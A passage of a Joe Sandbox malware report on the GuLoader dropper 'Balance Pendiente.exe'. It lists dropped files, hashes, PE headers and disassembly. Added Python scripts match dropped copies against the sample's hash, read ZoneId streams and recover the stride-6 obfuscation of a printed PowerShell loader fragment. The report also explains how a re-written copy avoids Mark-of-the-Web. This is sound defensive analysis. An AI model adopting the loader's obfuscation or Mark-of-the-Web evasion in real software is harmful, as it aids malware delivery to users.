                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
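Two adjacent entries above deserve a second look. The Nullsoft-installer PE that powershell.exe wrote carries the same MD5, SHA-1 and SHA-256 as the submitted sample, so the PowerShell stage re-wrote the original executable to disk; the report prints the dropped copy's hashes in upper case and the sample's in lower case, so a naive string compare misses the match. The 26-byte file written right after it is a Zone.Identifier stream with ZoneId=0, which stamps that copy as LocalMachine origin instead of Internet (ZoneId=3), so it has no Mark-of-the-Web for SmartScreen or the Attachment Manager to act on. The script below is an added triage example and is not part of the Joe Sandbox report: its input is a constructed subset of the entries from this section (previews abbreviated), the submitted sample's hash is taken from the report's General Information block, and the two triage rules are my own.

```python
import re
from typing import List, Optional

# Constructed input: a subset of the dropped-file entries from this section of
# the report, one "Key:Value" line each, exactly as the listing prints them
# (previews abbreviated). The entries are: a PowerShell AppLocker test file,
# the NSIS PE written by powershell.exe, and the 26-byte [ZoneTransfer] stream.
LISTING = r"""
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):507280
MD5:E70E71A31781B44F850A39693784CE74
SHA-256:A02B56B4C74424B72AE21D4737E822653E68B9762E1AEB313D81BD45ABCE39E7
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 38%
• Antivirus: Virustotal, Detection: 44%
Preview:MZ......................@.......
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
"""

# SHA-256 of the submitted sample as printed in the report's General
# Information block (lower-case there; the dropped-file list prints upper-case).
SUBMITTED_SHA256 = "a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7"

# URL security zone values used in the Zone.Identifier alternate data stream.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
              3: "Internet", 4: "RestrictedSites"}


def parse_listing(text: str) -> List[dict]:
    """Split the report's flat Key:Value lines into one dict per dropped file.

    A new entry starts at every "Process:" line; "•" bullet lines (antivirus
    and Joe Sandbox View hits) are collected under the "Bullets" key.
    """
    entries: List[dict] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            entries[-1].setdefault("Bullets", []).append(line.lstrip("• ").strip())
            continue
        key, sep, value = line.partition(":")   # first ':' only: values hold paths
        if not sep:
            continue
        if key == "Process":
            entries.append({})
        entries[-1][key] = value.strip()
    return entries


def zone_id(preview: str) -> Optional[int]:
    """Extract ZoneId from a Zone.Identifier stream; tolerates the '....' that
    the preview substitutes for CRLF."""
    m = re.search(r"ZoneId=(\d+)", preview)
    return int(m.group(1)) if m else None


def triage(entries: List[dict], submitted_sha256: str) -> List[str]:
    """Flag (1) dropped files that are byte-identical to the submitted sample
    and (2) Zone.Identifier streams, reporting whether the zone is one that
    Windows treats as carrying a Mark-of-the-Web (ZoneId 3 or 4)."""
    findings = []
    want = submitted_sha256.strip().lower()        # normalise case before comparing
    for e in entries:
        proc = e.get("Process", "?").rsplit("\\", 1)[-1]
        if e.get("SHA-256", "").lower() == want:
            findings.append(f"self-copy: {proc} wrote a byte-identical copy of the "
                            f"submitted sample ({e.get('Size (bytes)', '?')} bytes)")
        preview = e.get("Preview", "")
        if "[ZoneTransfer]" in preview:
            z = zone_id(preview)
            motw = "carries Mark-of-the-Web" if z in (3, 4) else "no Mark-of-the-Web"
            findings.append(f"zone-identifier: {proc} wrote ZoneId={z} "
                            f"({ZONE_NAMES.get(z, 'unknown')}; {motw})")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_listing(LISTING), SUBMITTED_SHA256):
        print(finding)
```

The parser keys on the report's own Key:Value lines and starts a new record at each Process: line, so the whole dropped-files section can be pasted in unchanged. Zones 0 to 2 are reported as having no Mark-of-the-Web because SmartScreen and the Attachment Manager only act on Internet (3) and RestrictedSites (4).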
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:Generic INItialization configuration [registrar aabredden]
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):357
                                                                                                                                                                  Entropy (8bit):4.322293998459369
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb
                                                                                                                                                                  MD5:ACED15FD55D311D663ECC7B5F386B8E2
                                                                                                                                                                  SHA1:A7F36FD33206209CB0E5E39643EC8C6773D5ED3B
                                                                                                                                                                  SHA-256:16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F
                                                                                                                                                                  SHA-512:7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[bloodstained initialdeterminanten]..unprescinded produktionsforholds identific dysurias biblioteksbgernes textman kaldte spotlightet archearl,sofus unvessel souffleer cementblanders stoneweed rufe trningsdragternes genitivisk bartizaned....[registrar aabredden]..;teardowns batchkrselens unform gradgrind,eksekveringens afskrifters secretors printerporte..
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (3143), with CRLF, LF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60368
                                                                                                                                                                  Entropy (8bit):5.280991252251336
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:IuWZnBGyJTf6U1uxBx174Nsp/0PjUt5hYlH:ULvTf/1uHNcj6XYt
                                                                                                                                                                  MD5:798E71F2FB7AECCBF532D4B9C7484B56
                                                                                                                                                                  SHA1:D22784524AC6412395F51A3FD3FE0CFBA04F034C
                                                                                                                                                                  SHA-256:1669D04C0289873AA79409AC3522A90CE116740F52C11EB8833AAF5C8908ACB8
                                                                                                                                                                  SHA-512:29F868A51AC1B4C25A4A7D1FAD093E6FCCC3ADC762F8FA791C8E728AAF16A26CE0E43CDF45F955D0152D94CCFF514776426BFB9A088CEBF77EF9521A642606BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:$Styningens=$Urlighedens;........$Habitudes = @'.Sprea.Vandg$DodoeGLibe nUnde oForeasEkatatProwli.raskkS rueeDandyr Nephe N.nmnDendrs Read=Proto$RenmoU trv nTrededAndreiLarg.sTemmeo AnthbP leoeT akeyPolypeHalvtd Auto;Komma.MyopifJingpuHujennBatracSkunktRheumiBaskeoO erlnDistr PerfeT owariEts.rc RoaduFalbynTvegeaTiggenArbej Basid( Smil$.okkaSAcciap MediiHuls.rKiggei odpotSwou uOpgavsFejribov.rdeN tras PhrekDs ghaBortetPereinBakunisenilnElusigprotoeTakkenManufsUnpar,s.ogh$Bi.esPMdedalAalekuBehavsHeterkKen avPy oma acetm Pl vpu impeScatbrOsteafD komeSub rkDav,ntsubpru SupimSkambmSvbere XenatFoelesIsabe)Dom.e ebel{ akhi.Taage.Woodw$ChemoS B fapCitrooBrneetCon,ep ChlorGrapiiHypassAscideSk ver BrnesCompe orbe(RegnsKunthouPr.cerSikkes Realu yldsBillapTol,alHovedaAsiarnLic,teFr nzrHjor.nUpwreeCouris Vand Misti'Mo.onOVenstv.rpineTankbrKval.l Hero$GlassUBlushnBllenm esos, KrontUngdySPakk B etsbeRemonv C lcgUddate Bogtp Lesq GifteaK aftcHexachLicheiA tifiUhyreLG nneaTegnkmPhra bRepli ForhurOe
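The preview above shows the GuLoader stage-1 layout: one plain assignment, then a large here-string ($Habitudes = @'...) whose real content is interleaved with junk so that only every sixth character counts. Taking characters 5, 11, 17, ... of the fragment that follows the here-string opener yields `$Gnostikerens=$Undisobeyed;`, i.e. another variable assignment of the same style as the first line. The script's own decode loop sits further down the 60 KB file and is not visible in the preview, so the stride and offset are recovered by search here rather than read from the script. The block below is an added example and is not code from the report or from the sample: the fragment is copied from the preview (with its '.' placeholders for non-printable bytes, and the first partial group dropped so the sample starts on a whole group), and the PowerShell-token scoring heuristic used to pick the stride is my own.

```python
import re
from typing import NamedTuple

# Constructed input: the start of the here-string from the preview above,
# copied as the report prints it ('.' stands for a non-printable or non-ASCII
# byte). The partial "Sprea." group before it is dropped so the sample begins
# on a whole 6-character group.
PREVIEW_FRAGMENT = (
    "Vandg$DodoeGLibe nUnde oForeasEkatatProwli.raskkS rueeDandyr Nephe "
    "N.nmnDendrs Read=Proto$RenmoU trv nTrededAndreiLarg.sTemmeo AnthbP "
    "leoeT akeyPolypeHalvtd Auto;"
)

# A PowerShell-looking token: "$name" followed by '=', '(' or ';'. The junk
# padding is letters, spaces and the odd '.', so real code scores and junk
# does not. (Heuristic chosen for this example, not taken from the sample.)
TOKEN = re.compile(r"\$[A-Za-z_]\w*\s*[=(;]")


class Guess(NamedTuple):
    score: int
    stride: int
    offset: int
    text: str


def every_nth(text: str, offset: int, stride: int) -> str:
    """Keep characters offset, offset+stride, ...; this is all the loader's
    decode loop has to do to turn the here-string back into PowerShell."""
    return text[offset::stride]


def recover_stride(text: str, max_stride: int = 16) -> Guess:
    """Brute-force (stride, offset) and keep the candidate with the most
    PowerShell tokens; on ties prefer the larger stride (less junk kept)."""
    best = Guess(-1, 0, 0, "")
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            cand = every_nth(text, offset, stride)
            score = len(TOKEN.findall(cand))
            if (score, stride) > (best.score, best.stride):
                best = Guess(score, stride, offset, cand)
    return best


if __name__ == "__main__":
    g = recover_stride(PREVIEW_FRAGMENT)
    print(f"stride={g.stride} offset={g.offset} tokens={g.score}")
    print(g.text)
```

Against the fragment the search settles on stride 6, offset 5 and prints `$Gnostikerens=$Undisobeyed;`. Applied to the full here-string from the dropped file (a few thousand characters per line, per the file-type line above) the same call recovers the next stage; a divisor of the true stride keeps extra junk and a multiple drops real characters, which is why both score lower than the correct pair.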
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 79x629, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):7357
                                                                                                                                                                  Entropy (8bit):7.91945978739656
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL
                                                                                                                                                                  MD5:F32B2F6007A74312B5F0CB1AA5B26680
                                                                                                                                                                  SHA1:BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3
                                                                                                                                                                  SHA-256:2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825
                                                                                                                                                                  SHA-512:EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......u.O.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J).8V.".. ..)...OQM......8P).sH..K.p...L...M..M..N..S.U......G.,..T.9....u4........H......R.LZ.U.X.*E...*..Gc.|\.P.EI.sY.sh....QH..@.[.Q..#.z..R.9.ED.jQZ"Y".*5.2...TT.c..T.1..+.....E.S.sR6*.....).s.R.F.(.Q,.:..8..T.*.E... .PU..T3D8.tc.9W.O.~Q.RP...-5....IzT.Q..TV..L.1VTT1....Q...E.1S....4.c.SR..).?tj.).......8..Z....8."N-{T.*$...R0.,.*......}.Q".>.Sq.
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):338276
                                                                                                                                                                  Entropy (8bit):7.671083634160716
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:WWxwim+hZhU4Cb/9U5usu4LX4Ev0P+sDBG6IzhV8ulhplMjNzxU9l:WWxrPhxY9su+IBGsDI9qEQxUH
                                                                                                                                                                  MD5:A4DD91D5ACFA3D8154510A16A27792DF
                                                                                                                                                                  SHA1:7F797BEECC8609A7B617A7CCD6BA8A335D475A47
                                                                                                                                                                  SHA-256:5AE90EE62220502C1041B177854398C94B9F42F6115CE6FCA120B7C0702C0286
                                                                                                                                                                  SHA-512:8F119081CF9625F036AC4783A7D127D25E8BF82BC6FEBE804EDAC2D18B71B9E85AB2C26CB04AA1A28A47CC1D49BD0676D486FEA917CA872B7C2E43A6AF889C07
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..........cc.11.:...................................................................;;....}}...........iiii...bbb.......E...............................R.......w..+........x.{{{.......................nn.......Z..............u..6...........................@........r.oo..................|........L................W..""......................a.............. ...............eeee......m........555.....................................X........z......R.$.h...............................J...............................................N.......z...{......................y...........mm...................||......//..YYYY..e.....d.j....................a..........o..............WW.//....WWW...sss.%%.'........?.......WWW...................................u.....eee............nn....mm...........ddd.....0............>>.............}}.\\.>>..........11...M.....bbbb..1.........................{.....'....FF...........................................t.........9.......j.............OO.......................k.
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):188
                                                                                                                                                                  Entropy (8bit):4.482002609682535
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn
                                                                                                                                                                  MD5:2B51E420AA9188A74DB9D853C1225B5C
                                                                                                                                                                  SHA1:B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164
                                                                                                                                                                  SHA-256:FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53
                                                                                                                                                                  SHA-512:574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:benittas thirstier inductometer.Halvlngde forlyder roth..Cicuta barbaren udsugningsanlggets,privatisere rationalizing protogyny udmntningsprofil gyrolith volkswagen..[tyndtarmes sstykke]..
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:Generic INItialization configuration [FJORTENAARSFDSELSDAGES UDSTDELSERNES]
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):279
                                                                                                                                                                  Entropy (8bit):4.994626166298632
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R
                                                                                                                                                                  MD5:6620E9C5C35F1FEAAFC525A49FF31080
                                                                                                                                                                  SHA1:969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD
                                                                                                                                                                  SHA-256:FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA
                                                                                                                                                                  SHA-512:A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[PALEOMAGNETISM CLADOCEROUS]..praseodymium undeftly vestenvindes.Nskesedlers forgrundsfarves spandaueren skrmmevaabnets....;toyos oddesund apostrofe fremfrelses.Opsamlingsbeholdere alkoholdebut unadvertised suggestioneres overprovide......[FJORTENAARSFDSELSDAGES UDSTDELSERNES]..
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 424x693, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32639
                                                                                                                                                                  Entropy (8bit):7.9475019669336495
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP
                                                                                                                                                                  MD5:86647E5BC7C82F155C5CB0EC05F40E9F
                                                                                                                                                                  SHA1:E0946F26733AA05FCEAE067377622C083AF88C8D
                                                                                                                                                                  SHA-256:6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19
                                                                                                                                                                  SHA-512:7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........H.O..,Q.1..x...t.S.:P8<S...Hb.M(...t..x.R..........4.(..\....J^{R.....N....H...c.>..l.(f.@.u..$&$.U.Q.8..Lt..I..L.%ii...m..N..........R.sU..Ez..L..<S.q.V..s...=..)2^....0.<6{T.8..?.p.Tc..NOZ....?<sP.....O....H....j }..G. '\dsN.....H.}MIC..=...ii.....(.{.....Z..t4.(.v}...n....1E<c.z@8.v2i..8......zR......i......m...q.!.(?.?g.....M..t...E+
                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                  Entropy (8bit):7.58580269013346
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                  File name:Balance Pendiente.exe
                                                                                                                                                                  File size:507'280 bytes
                                                                                                                                                                  MD5:e70e71a31781b44f850a39693784ce74
                                                                                                                                                                  SHA1:ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
                                                                                                                                                                  SHA256:a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7
                                                                                                                                                                  SHA512:2a7994cec6638f7ff523358e7df0bfddad0f2abaef89e598455e9f0b7a44009e139ac9f9afd7ac38377ed302727c5c75322327b8fabf0b450835cdbb5c52a9a8
                                                                                                                                                                  SSDEEP:12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p
                                                                                                                                                                  TLSH:33B4F1A37286E5E7F4560CF4CC299AF993A2ED01D9D85503F184BF2F387366245250AF
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@
                                                                                                                                                                  Icon Hash:371f9d96cb0d1703
                                                                                                                                                                  Entrypoint:0x4030b8
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:e160ef8e55bb9d162da4e266afd9eef3
                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                  Signature Issuer:CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US
                                                                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                  Error Number:-2146762487
                                                                                                                                                                   Not Before:06/05/2024 11:26:53
                                                                                                                                                                   Not After:06/05/2025 11:26:53
                                                                                                                                                                  Subject Chain
                                                                                                                                                                  • CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US
                                                                                                                                                                  Version:3
                                                                                                                                                                  Thumbprint MD5:92807D7374421D79A823FA7ACA6FF4C6
                                                                                                                                                                  Thumbprint SHA-1:05F5583BAAEA1B3C4E6C4B87EF108D1468F3E327
                                                                                                                                                                  Thumbprint SHA-256:E8C65A4CB80B655AEF4C0D07A3D407B6265C0EC80F62EE79AC5291A245D3AEA2
                                                                                                                                                                  Serial:391A08F4CFA8FACE743EC806DF49200A45DD1E7D
                                                                                                                                                                  Instruction
                                                                                                                                                                  sub esp, 00000184h
                                                                                                                                                                  push ebx
                                                                                                                                                                  push ebp
                                                                                                                                                                  push esi
                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                  push edi
                                                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                                                  mov dword ptr [esp+10h], 00409190h
                                                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                  call dword ptr [00407034h]
                                                                                                                                                                  push 00008001h
                                                                                                                                                                  call dword ptr [0040711Ch]
                                                                                                                                                                  push ebx
                                                                                                                                                                  call dword ptr [0040728Ch]
                                                                                                                                                                  push 00000008h
                                                                                                                                                                  mov dword ptr [00423778h], eax
                                                                                                                                                                  call 00007F773490ADCAh
                                                                                                                                                                  mov dword ptr [004236C4h], eax
                                                                                                                                                                  push ebx
                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                  push 00000160h
                                                                                                                                                                  push eax
                                                                                                                                                                  push ebx
                                                                                                                                                                  push 0041EC80h
                                                                                                                                                                  call dword ptr [00407164h]
                                                                                                                                                                  push 00409180h
                                                                                                                                                                  push 00422EC0h
                                                                                                                                                                  call 00007F773490AA74h
                                                                                                                                                                  call dword ptr [00407120h]
                                                                                                                                                                  mov ebp, 00429000h
                                                                                                                                                                  push eax
                                                                                                                                                                  push ebp
                                                                                                                                                                  call 00007F773490AA62h
                                                                                                                                                                  push ebx
                                                                                                                                                                  call dword ptr [00407118h]
                                                                                                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                                                                                                  mov dword ptr [004236C0h], eax
                                                                                                                                                                  mov eax, ebp
                                                                                                                                                                  jne 00007F773490803Ch
                                                                                                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                                                                                                  mov eax, 00429001h
                                                                                                                                                                  push dword ptr [esp+14h]
                                                                                                                                                                  push eax
                                                                                                                                                                  call 00007F773490A4F2h
                                                                                                                                                                  push eax
                                                                                                                                                                  call dword ptr [00407220h]
                                                                                                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                                                                                                  jmp 00007F77349080F5h
                                                                                                                                                                  cmp cl, 00000020h
                                                                                                                                                                  jne 00007F7734908038h
                                                                                                                                                                  inc eax
                                                                                                                                                                  cmp byte ptr [eax], 00000020h
                                                                                                                                                                  je 00007F773490802Ch
                                                                                                                                                                  Programming Language:
                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x18a50 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x7b610 | 0x780 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a6a | 0x5c00 | 8781c451557a4626018483faabe438d0 | False | 0.6614724864130435 | data | 6.417713695663469 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x11ce | 0x1200 | 640f709ec19b4ed0455a4c64e5934d5e | False | 0.4520399305555556 | OpenPGP Secret Key | 5.23558258677739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a7b8 | 0x400 | c9a433d4fe67308d6a5942cfb667cbe7 | False | 0.5986328125 | data | 4.862130355383113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x12000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x36000 | 0x18a50 | 0x18c00 | ae1da6d52c6b9db5a72bcee2295c6945 | False | 0.3393604008838384 | data | 4.6330392279203245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x36448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.2523660238968414
RT_ICON | 0x46c70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4220954356846473
RT_ICON | 0x49218 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.49343339587242024
RT_ICON | 0x4a2c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5876865671641791
RT_ICON | 0x4b168 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5450819672131147
RT_ICON | 0x4baf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.7319494584837545
RT_ICON | 0x4c398 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.7811059907834101
RT_ICON | 0x4ca60 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.47804878048780486
